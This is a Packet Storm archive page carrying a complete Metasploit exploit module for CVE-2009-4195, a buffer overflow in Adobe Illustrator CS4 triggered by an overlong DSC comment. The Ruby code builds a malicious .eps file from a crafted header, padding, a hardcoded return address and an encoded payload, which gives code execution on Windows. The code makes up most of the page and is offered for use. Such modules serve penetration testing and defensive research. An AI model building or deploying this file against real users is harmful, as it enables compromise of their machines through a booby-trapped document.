what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Adobe Illustrator CS4 v14.0.0

Adobe Illustrator CS4 v14.0.0
Posted Dec 31, 2009
Authored by Nine:Situations:Group::pyrokinesis, dookie | Site metasploit.com

Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit

tags | exploit, overflow
advisories | CVE-2009-4195
SHA-256 | fa7d623818aa870797cedbdfe793f36edde2119163f962043b50da8da39732e1

Adobe Illustrator CS4 v14.0.0

Change Mirror Download
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Illustrator CS4 v14.0.0',
'Description' => %q{
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
},
'License' => MSF_LICENSE,
'Author' => [ 'Nine:Situations:Group::pyrokinesis', 'dookie' ],
'Version' => '$Revision: 7743 $',
'References' =>
[
[ 'CVE', '2009-4195' ],
[ 'BID', '37192' ],
[ 'OSVDB', '60632' ],
[ 'URL', 'http://retrogod.altervista.org/9sg_adobe_illuso.html' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10281' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0D\x0C\x0A",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x4B4B5173 } ], # CALL ESI in icudt36.dll
],
'Privileged' => false,
'DisclosureDate' => 'Dec 03 2009',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.eps']),
], self.class)

end

def exploit

header = "\xc5\xd0\xd3\xc6\x20\x00\x00\x00\x05\xc8\x04\x00\x00\x00"
header << "\x00\x00\x00\x00\x00\x00%\xc8\x04\x00\xb5I\x01\x00\xff"
header << "\xff\x00\x00"
header << "%!PS-Adobe-3.1\x20EPSF-3.0\r\n"
header << "%ADO_DSC_Encoding:\x20Windows\x20Roman\r\n"
header << "%"
sploit = rand_text_alpha(41699)
sploit << [target.ret].pack('V')
sploit << rand_text_alpha(2291)
sploit << "%Title:\x20Untitled-1.eps\r\n"
sploit << "%AAAAAAAA"
sploit << payload.encoded
trailer = ": A\r\n"
trailer << "%%For:\x20alias\r\n"
trailer << "%%CreationDate:\x2011/27/2009\r\n"
trailer += "%%BoundingBox:\x200\x200\x20227\x20171\r\n"
trailer += "%%HiResBoundingBox:\x200\x200\x20226.5044\x20170.3165\r\n"
trailer += "%%CropBox:\x200\x200\x20226.5044\x20170.3165\r\n"
trailer += "%%LanguageLevel:\x202\r\n"
trailer += "%%DocumentData:\x20Clean7Bit\r\n"
trailer += "%ADOBeginClientInjection:\x20DocumentHeader\x20\"AI11EPS\"\r\n"
trailer += "%%AI8_CreatorVersion:\x2014.0.0\r"
trailer += "%AI9_PrintingDataBegin\r"
trailer += "%ADO_BuildNumber:\x20Adobe\x20Illustrator(R)\x2014.0.0\x20x367\x20R\x20agm\x204.4890\x20ct\x205.1541\r"
trailer += "%ADO_ContainsXMP:\x20MainFirst\r"
trailer += "%AI7_Thumbnail:\x20128\x2096\x208\r"
trailer += "%%BeginData:\x204096\x20Hex\x20Bytes\r"
trailer += "%0000330000660000990000CC0033000033330033660033990033CC0033FF\r\n"

eps = header + sploit + trailer

print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create(eps)

end

end
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close